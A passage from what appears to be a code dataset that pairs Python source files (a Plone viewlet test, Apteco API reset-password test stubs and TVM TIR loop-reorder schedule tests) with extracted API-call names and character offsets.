[((1803, 1860), 'pytube.YouTube', 'YouTube', (['url'], {'on_progress_callback': 'self.progress_function'}), '(url, on_progress_callback=self.progress_function)\n', (1810, 1860), False, 'from pytube import YouTube\n'), ((2136, 2149), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (2146, 2149), False, 'import time\n'), ((3222, 3232), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3230, 3232), False, 'import sys\n'), ((249, 268), 'sys.stdout.isatty', 'sys.stdout.isatty', ([], {}), '()\n', (266, 268), False, 'import sys\n'), ((351, 364), 'os.system', 'system', (['"""cls"""'], {}), "('cls')\n", (357, 364), False, 'from os import system, name\n'), ((382, 397), 'os.system', 'system', (['"""clear"""'], {}), "('clear')\n", (388, 397), False, 'from os import system, name\n'), ((676, 716), 'pyfiglet.figlet_format', 'figlet_format', (['"""RatTube"""'], {'font': '"""banner3"""'}), "('RatTube', font='banner3')\n", (689, 716), False, 'from pyfiglet import figlet_format\n'), ((3712, 3725), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (3722, 3725), False, 'import time\n')]
|
# encoding: utf-8
# Copyright 2012 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
from ipdasite.theme.testing import IPDA_SITE_THEME_INTEGRATION_TESTING
from Products.Five.browser import BrowserView as View
from zope.component import getMultiAdapter
from zope.viewlet.interfaces import IViewlet, IViewletManager
import unittest2 as unittest
class ViewletTest(unittest.TestCase):
layer = IPDA_SITE_THEME_INTEGRATION_TESTING
def setUp(self):
self.context = self.layer['portal']
self.request = self.layer['app'].REQUEST
self.view = View(self.context, self.request)
def testViewletInterfaces(self):
'''Ensure viewlet classes implement proper interfaces'''
from ipdasite.theme.browser.agencies import AgenciesViewlet
self.failUnless(IViewlet.implementedBy(AgenciesViewlet))
def test_suite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
[
"unittest2.defaultTestLoader.loadTestsFromName",
"zope.viewlet.interfaces.IViewlet.implementedBy",
"Products.Five.browser.BrowserView",
"unittest2.main"
] |
[((915, 969), 'unittest2.defaultTestLoader.loadTestsFromName', 'unittest.defaultTestLoader.loadTestsFromName', (['__name__'], {}), '(__name__)\n', (959, 969), True, 'import unittest2 as unittest\n'), ((1002, 1041), 'unittest2.main', 'unittest.main', ([], {'defaultTest': '"""test_suite"""'}), "(defaultTest='test_suite')\n", (1015, 1041), True, 'import unittest2 as unittest\n'), ((617, 649), 'Products.Five.browser.BrowserView', 'View', (['self.context', 'self.request'], {}), '(self.context, self.request)\n', (621, 649), True, 'from Products.Five.browser import BrowserView as View\n'), ((844, 883), 'zope.viewlet.interfaces.IViewlet.implementedBy', 'IViewlet.implementedBy', (['AgenciesViewlet'], {}), '(AgenciesViewlet)\n', (866, 883), False, 'from zope.viewlet.interfaces import IViewlet, IViewletManager\n')]
|
# coding: utf-8
"""
Apteco API
An API to allow access to Apteco Marketing Suite resources # noqa: E501
The version of the OpenAPI document: v2
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import apteco_api
from apteco_api.api.user_reset_password_requests_api import UserResetPasswordRequestsApi # noqa: E501
from apteco_api.rest import ApiException
class TestUserResetPasswordRequestsApi(unittest.TestCase):
"""UserResetPasswordRequestsApi unit test stubs"""
def setUp(self):
self.api = apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi() # noqa: E501
def tearDown(self):
pass
def test_user_reset_password_requests_confirm_reset_password_request(self):
"""Test case for user_reset_password_requests_confirm_reset_password_request
Confirms a given reset password request and changes the password # noqa: E501
"""
pass
def test_user_reset_password_requests_create_reset_password_request(self):
"""Test case for user_reset_password_requests_create_reset_password_request
Creates a new reset password requests, which will check that the provided email address exists and then issue a confirmation notification # noqa: E501
"""
pass
def test_user_reset_password_requests_get_reset_password_request(self):
"""Test case for user_reset_password_requests_get_reset_password_request
Requires OrbitAdmin: Returns details for a given reset password request # noqa: E501
"""
pass
def test_user_reset_password_requests_get_reset_password_requests(self):
"""Test case for user_reset_password_requests_get_reset_password_requests
Requires OrbitAdmin: Returns all the current reset password requests in the system. # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi"
] |
[((1974, 1989), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1987, 1989), False, 'import unittest\n'), ((611, 689), 'apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi', 'apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi', ([], {}), '()\n', (687, 689), False, 'import apteco_api\n')]
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-function-docstring,missing-module-docstring
import sys
import pytest
import tvm
from tvm import tir
from tvm.script import ty
from tvm.tir.schedule.testing import verify_trace_roundtrip
# pylint: disable=no-member,invalid-name,unused-variable
@tvm.script.tir
def elementwise(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_not_affine(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for i, j, k, l in tir.grid(128, 128, 128, 8):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l * 16)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_dependent_loop(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for i in tir.serial(0, 128):
for j, k, l in tir.grid(128, i, 128):
with tir.block([128, 128, i, 128], "B") as [vi, vj, vk, vl]:
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_predicate(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for i, j, k, l in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_non_single_branch(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128))
C = tir.alloc_buffer((128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128))
for i, j in tir.grid(128, 128):
for k in tir.serial(0, 128):
with tir.block([128, 128, 128], "C") as [vi, vj, vk]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
C[vi, vj, vk] = A[vi, vj, vk] * 2.0
for k in tir.serial(0, 128):
with tir.block([128, 128, 128], "B") as [vi, vj, vk]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
B[vi, vj, vk] = C[vi, vj, vk] * 2.0
@tvm.script.tir
def elementwise_with_loops_not_same_scope(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128))
for i, j in tir.grid(128, 128):
with tir.block([128, 128], "A") as [vi, vj]:
tir.bind(vi, i)
tir.bind(vj, j)
for k in tir.serial(0, 128):
with tir.block([128], "B") as [vk]:
tir.bind(vk, k)
tir.reads([A[vi, vj, vk]])
tir.writes([B[vi, vj, vk]])
B[vi, vj, vk] = A[vi, vj, vk] * 2.0
@tvm.script.tir
def elementwise_with_wrong_block_var_type(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128))
for i, j, k in tir.grid(128, 128, 128):
with tir.block([128, 128, tir.scan_axis(0, 128)], "B") as [vi, vj, vk]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.reads([A[vi, vj, vk]])
tir.writes([B[vi, vj, vk]])
B[vi, vj, vk] = A[vi, vj, vk] * 2.0
@tvm.script.tir
def elementwise_reordered(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for l, j, k, i in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_reordered2(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for k, j, i, l in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_reordered_with_predicate(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for l, j, k, i in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100)
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def opaque_access(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [16, 16], "float32")
B = tir.match_buffer(b, [16, 16], "float32")
with tir.block([16, 16], "A") as [vi, vj]:
tir.reads([])
tir.writes([A[0:16, 0:16]])
tir.store(A.data, vi * 16 + vj, 1)
with tir.block([16, 16], "B") as [vi, vj]:
tir.reads([])
tir.writes([B[0:16, 0:16]])
tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle"))
@tvm.script.tir
def opaque_access_reorder(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [16, 16], "float32")
B = tir.match_buffer(b, [16, 16], "float32")
for j, i in tir.grid(16, 16):
with tir.block([16, 16], "A") as [vi, vj]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.reads([])
tir.writes([A[0:16, 0:16]])
tir.store(A.data, vi * 16 + vj, 1)
for j, i in tir.grid(16, 16):
with tir.block([16, 16], "B") as [vi, vj]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.reads([])
tir.writes([B[0:16, 0:16]])
tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle"))
# pylint: enable=no-member,invalid-name,unused-variable
def test_reorder():
sch = tir.Schedule(elementwise, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
sch.reorder(l, i)
tvm.ir.assert_structural_equal(elementwise_reordered, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=elementwise)
def test_reorder2():
sch = tir.Schedule(elementwise, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
sch.reorder(k, i, l)
tvm.ir.assert_structural_equal(elementwise_reordered2, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=elementwise)
def test_reorder_with_opaque_access():
sch = tir.Schedule(opaque_access, debug_mask="all")
block_a = sch.get_block("A")
i, j = sch.get_loops(block_a)
sch.reorder(j, i)
block_b = sch.get_block("B")
i, j = sch.get_loops(block_b)
sch.reorder(j, i)
tvm.ir.assert_structural_equal(opaque_access_reorder, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=opaque_access)
def test_reorder_with_predicate():
sch = tir.Schedule(elementwise_predicate, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
sch.reorder(l, i)
tvm.ir.assert_structural_equal(elementwise_reordered_with_predicate, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=elementwise_predicate)
def test_reorder_fail_with_multi_appearance_loops():
sch = tir.Schedule(elementwise, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i, i)
def test_reorder_fail_with_non_single_branch_loop():
sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all")
block_b = sch.get_block("B")
i, j, k = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i)
sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all")
block_b = sch.get_block("B")
block_c = sch.get_block("C")
i, j, k1 = sch.get_loops(block_b)
_, _, k2 = sch.get_loops(block_c)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k1, i, k2)
def test_reorder_fail_with_loops_not_under_same_scope():
sch = tir.Schedule(elementwise_with_loops_not_same_scope, debug_mask="all")
block_b = sch.get_block("B")
block_a = sch.get_block("A")
i, j = sch.get_loops(block_a)
k = sch.get_loops(block_b)[0]
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i)
def test_reorder_fail_with_wrong_block_var_type():
sch = tir.Schedule(elementwise_with_wrong_block_var_type, debug_mask="all")
block_b = sch.get_block("B")
i, j, k = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i)
def test_reorder_fail_with_dependent_loops():
sch = tir.Schedule(elementwise_dependent_loop, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(l, i)
def test_reorder_fail_not_affine_bindings():
sch = tir.Schedule(elementwise_not_affine, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(l, i)
if __name__ == "__main__":
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
[
"tvm.tir.match_buffer",
"tvm.tir.tvm_fill_fragment",
"tvm.tir.scan_axis",
"tvm.tir.store",
"tvm.ir.assert_structural_equal",
"tvm.tir.writes",
"pytest.main",
"pytest.raises",
"tvm.tir.block",
"tvm.tir.bind",
"tvm.tir.serial",
"tvm.tir.Schedule",
"tvm.tir.alloc_buffer",
"tvm.tir.where",
"tvm.tir.schedule.testing.verify_trace_roundtrip",
"tvm.tir.grid",
"tvm.tir.reads"
] |
[((1135, 1176), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (1151, 1176), False, 'from tvm import tir\n'), ((1185, 1226), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (1201, 1226), False, 'from tvm import tir\n'), ((1436, 1477), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (1452, 1477), False, 'from tvm import tir\n'), ((1486, 1527), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (1502, 1527), False, 'from tvm import tir\n'), ((1550, 1576), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(8)'], {}), '(128, 128, 128, 8)\n', (1558, 1576), False, 'from tvm import tir\n'), ((1916, 1957), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (1932, 1957), False, 'from tvm import tir\n'), ((1966, 2007), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (1982, 2007), False, 'from tvm import tir\n'), ((2021, 2039), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (2031, 2039), False, 'from tvm import tir\n'), ((2309, 2350), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (2325, 2350), False, 'from tvm import tir\n'), ((2359, 2400), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (2375, 2400), False, 'from tvm import tir\n'), ((2423, 2451), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (2431, 2451), False, 'from tvm import tir\n'), ((2744, 2780), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128)'], {}), '(a, (128, 128, 128))\n', (2760, 2780), False, 'from tvm import tir\n'), ((2789, 2822), 'tvm.tir.alloc_buffer', 'tir.alloc_buffer', (['(128, 128, 128)'], {}), '((128, 128, 128))\n', (2805, 2822), False, 'from tvm import tir\n'), ((2831, 2867), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128)'], {}), '(b, (128, 128, 128))\n', (2847, 2867), False, 'from tvm import tir\n'), ((2884, 2902), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)'], {}), '(128, 128)\n', (2892, 2902), False, 'from tvm import tir\n'), ((3511, 3547), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128)'], {}), '(a, (128, 128, 128))\n', (3527, 3547), False, 'from tvm import tir\n'), ((3556, 3592), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128)'], {}), '(b, (128, 128, 128))\n', (3572, 3592), False, 'from tvm import tir\n'), ((3609, 3627), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)'], {}), '(128, 128)\n', (3617, 3627), False, 'from tvm import tir\n'), ((4123, 4159), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128)'], {}), '(a, (128, 128, 128))\n', (4139, 4159), False, 'from tvm import tir\n'), ((4168, 4204), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128)'], {}), '(b, (128, 128, 128))\n', (4184, 4204), False, 'from tvm import tir\n'), ((4224, 4247), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)'], {}), '(128, 128, 128)\n', (4232, 4247), False, 'from tvm import tir\n'), ((4629, 4670), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (4645, 4670), False, 'from tvm import tir\n'), ((4679, 4720), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (4695, 4720), False, 'from tvm import tir\n'), ((4743, 4771), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (4751, 4771), False, 'from tvm import tir\n'), ((5102, 5143), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (5118, 5143), False, 'from tvm import tir\n'), ((5152, 5193), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (5168, 5193), False, 'from tvm import tir\n'), ((5216, 5244), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (5224, 5244), False, 'from tvm import tir\n'), ((5589, 5630), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (5605, 5630), False, 'from tvm import tir\n'), ((5639, 5680), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (5655, 5680), False, 'from tvm import tir\n'), ((5703, 5731), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (5711, 5731), False, 'from tvm import tir\n'), ((6120, 6160), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '[16, 16]', '"""float32"""'], {}), "(a, [16, 16], 'float32')\n", (6136, 6160), False, 'from tvm import tir\n'), ((6169, 6209), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '[16, 16]', '"""float32"""'], {}), "(b, [16, 16], 'float32')\n", (6185, 6209), False, 'from tvm import tir\n'), ((6649, 6689), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '[16, 16]', '"""float32"""'], {}), "(a, [16, 16], 'float32')\n", (6665, 6689), False, 'from tvm import tir\n'), ((6698, 6738), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '[16, 16]', '"""float32"""'], {}), "(b, [16, 16], 'float32')\n", (6714, 6738), False, 'from tvm import tir\n'), ((6755, 6771), 'tvm.tir.grid', 'tir.grid', (['(16)', '(16)'], {}), '(16, 16)\n', (6763, 6771), False, 'from tvm import tir\n'), ((7009, 7025), 'tvm.tir.grid', 'tir.grid', (['(16)', '(16)'], {}), '(16, 16)\n', (7017, 7025), False, 'from tvm import tir\n'), ((7391, 7434), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise'], {'debug_mask': '"""all"""'}), "(elementwise, debug_mask='all')\n", (7403, 7434), False, 'from tvm import tir\n'), ((7534, 7604), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['elementwise_reordered', "sch.mod['main']"], {}), "(elementwise_reordered, sch.mod['main'])\n", (7564, 7604), False, 'import tvm\n'), ((7609, 7657), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'elementwise'}), '(sch=sch, mod=elementwise)\n', (7631, 7657), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((7691, 7734), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise'], {'debug_mask': '"""all"""'}), "(elementwise, debug_mask='all')\n", (7703, 7734), False, 'from tvm import tir\n'), ((7837, 7908), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['elementwise_reordered2', "sch.mod['main']"], {}), "(elementwise_reordered2, sch.mod['main'])\n", (7867, 7908), False, 'import tvm\n'), ((7913, 7961), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'elementwise'}), '(sch=sch, mod=elementwise)\n', (7935, 7961), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((8013, 8058), 'tvm.tir.Schedule', 'tir.Schedule', (['opaque_access'], {'debug_mask': '"""all"""'}), "(opaque_access, debug_mask='all')\n", (8025, 8058), False, 'from tvm import tir\n'), ((8241, 8311), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['opaque_access_reorder', "sch.mod['main']"], {}), "(opaque_access_reorder, sch.mod['main'])\n", (8271, 8311), False, 'import tvm\n'), ((8316, 8366), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'opaque_access'}), '(sch=sch, mod=opaque_access)\n', (8338, 8366), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((8414, 8467), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_predicate'], {'debug_mask': '"""all"""'}), "(elementwise_predicate, debug_mask='all')\n", (8426, 8467), False, 'from tvm import tir\n'), ((8567, 8657), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['elementwise_reordered_with_predicate', "sch.mod['main']"], {}), "(elementwise_reordered_with_predicate, sch.\n mod['main'])\n", (8597, 8657), False, 'import tvm\n'), ((8657, 8715), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'elementwise_predicate'}), '(sch=sch, mod=elementwise_predicate)\n', (8679, 8715), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((8781, 8824), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise'], {'debug_mask': '"""all"""'}), "(elementwise, debug_mask='all')\n", (8793, 8824), False, 'from tvm import tir\n'), ((9039, 9100), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_non_single_branch'], {'debug_mask': '"""all"""'}), "(elementwise_non_single_branch, debug_mask='all')\n", (9051, 9100), False, 'from tvm import tir\n'), ((9254, 9315), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_non_single_branch'], {'debug_mask': '"""all"""'}), "(elementwise_non_single_branch, debug_mask='all')\n", (9266, 9315), False, 'from tvm import tir\n'), ((9605, 9674), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_with_loops_not_same_scope'], {'debug_mask': '"""all"""'}), "(elementwise_with_loops_not_same_scope, debug_mask='all')\n", (9617, 9674), False, 'from tvm import tir\n'), ((9945, 10014), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_with_wrong_block_var_type'], {'debug_mask': '"""all"""'}), "(elementwise_with_wrong_block_var_type, debug_mask='all')\n", (9957, 10014), False, 'from tvm import tir\n'), ((10216, 10274), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_dependent_loop'], {'debug_mask': '"""all"""'}), "(elementwise_dependent_loop, debug_mask='all')\n", (10228, 10274), False, 'from tvm import tir\n'), ((10478, 10532), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_not_affine'], {'debug_mask': '"""all"""'}), "(elementwise_not_affine, debug_mask='all')\n", (10490, 10532), False, 'from tvm import tir\n'), ((1236, 1272), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (1245, 1272), False, 'from tvm import tir\n'), ((2064, 2085), 'tvm.tir.grid', 'tir.grid', (['(128)', 'i', '(128)'], {}), '(128, i, 128)\n', (2072, 2085), False, 'from tvm import tir\n'), ((2921, 2939), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (2931, 2939), False, 'from tvm import tir\n'), ((3172, 3190), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (3182, 3190), False, 'from tvm import tir\n'), ((6219, 6243), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""A"""'], {}), "([16, 16], 'A')\n", (6228, 6243), False, 'from tvm import tir\n'), ((6265, 6278), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (6274, 6278), False, 'from tvm import tir\n'), ((6287, 6314), 'tvm.tir.writes', 'tir.writes', (['[A[0:16, 0:16]]'], {}), '([A[0:16, 0:16]])\n', (6297, 6314), False, 'from tvm import tir\n'), ((6323, 6357), 'tvm.tir.store', 'tir.store', (['A.data', '(vi * 16 + vj)', '(1)'], {}), '(A.data, vi * 16 + vj, 1)\n', (6332, 6357), False, 'from tvm import tir\n'), ((6367, 6391), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""B"""'], {}), "([16, 16], 'B')\n", (6376, 6391), False, 'from tvm import tir\n'), ((6413, 6426), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (6422, 6426), False, 'from tvm import tir\n'), ((6435, 6462), 'tvm.tir.writes', 'tir.writes', (['[B[0:16, 0:16]]'], {}), '([B[0:16, 0:16]])\n', (6445, 6462), False, 'from tvm import tir\n'), ((8907, 8943), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (8920, 8943), False, 'import pytest\n'), ((9180, 9216), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (9193, 9216), False, 'import pytest\n'), ((9467, 9503), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (9480, 9503), False, 'import pytest\n'), ((9818, 9854), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (9831, 9854), False, 'import pytest\n'), ((10094, 10130), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (10107, 10130), False, 'import pytest\n'), ((10357, 10393), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (10370, 10393), False, 'import pytest\n'), ((10615, 10651), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (10628, 10651), False, 'import pytest\n'), ((10721, 10759), 'pytest.main', 'pytest.main', (['([__file__] + sys.argv[1:])'], {}), '([__file__] + sys.argv[1:])\n', (10732, 10759), False, 'import pytest\n'), ((1591, 1627), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (1600, 1627), False, 'from 